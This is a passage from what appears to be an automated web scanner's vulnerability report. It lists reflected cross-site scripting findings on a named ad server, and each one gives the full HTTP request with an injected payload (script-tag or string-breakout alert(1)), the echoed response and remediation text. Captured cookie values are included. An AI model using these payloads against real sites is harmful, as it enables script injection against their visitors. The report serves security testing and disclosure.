Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_3003e64e"-alert(1)-"ec42b83e34b";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.353. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12000985820@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 796f4"-alert(1)-"69e83c326b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/12000985820@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300&796f4"-alert(1)-"69e83c326b1=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&796f4"-alert(1)-"69e83c326b1=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

4.354. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12037650882@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc6a0"><script>alert(1)</script>b7139dead4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMdc6a0"><script>alert(1)</script>b7139dead4e/2010DM/12037650882@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMdc6a0"><script>alert(1)</script>b7139dead4e/2010DM/879154918/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.355. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12037650882@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d35df"><script>alert(1)</script>5db05569f10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMd35df"><script>alert(1)</script>5db05569f10/12037650882@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMd35df"><script>alert(1)</script>5db05569f10/1336908080/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.356. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12037650882@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e3d8"><script>alert(1)</script>d4d7bda2c35 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/12037650882@x235e3d8"><script>alert(1)</script>d4d7bda2c35?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/2098105822/x235e3d8"><script>alert(1)</script>d4d7bda2c35/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.357. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12037650882@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16c23"-alert(1)-"dcc629a6211 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/12037650882@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_72816c23"-alert(1)-"dcc629a6211 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_72816c23"-alert(1)-"dcc629a6211";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.358. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12037650882@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d922"-alert(1)-"b61cd2ce280 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/12037650882@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728&9d922"-alert(1)-"b61cd2ce280=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728&9d922"-alert(1)-"b61cd2ce280=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

4.359. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1334085935@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 909dd"><script>alert(1)</script>b9fcaaeb6dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM909dd"><script>alert(1)</script>b9fcaaeb6dc/2010DM/1334085935@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM909dd"><script>alert(1)</script>b9fcaaeb6dc/2010DM/586614474/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.360. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1334085935@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7be0"><script>alert(1)</script>a8026b634ee was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMe7be0"><script>alert(1)</script>a8026b634ee/1334085935@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMe7be0"><script>alert(1)</script>a8026b634ee/377113669/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.361. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1334085935@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e37b"><script>alert(1)</script>2414a8aeb16 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1334085935@x236e37b"><script>alert(1)</script>2414a8aeb16?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1834901885/x236e37b"><script>alert(1)</script>2414a8aeb16/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.362. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1334085935@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccdf2"-alert(1)-"1e73f836517 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1334085935@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728ccdf2"-alert(1)-"1e73f836517 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728ccdf2"-alert(1)-"1e73f836517";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.363. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1334085935@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce89c"-alert(1)-"0f77d02c603 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1334085935@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728&ce89c"-alert(1)-"0f77d02c603=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
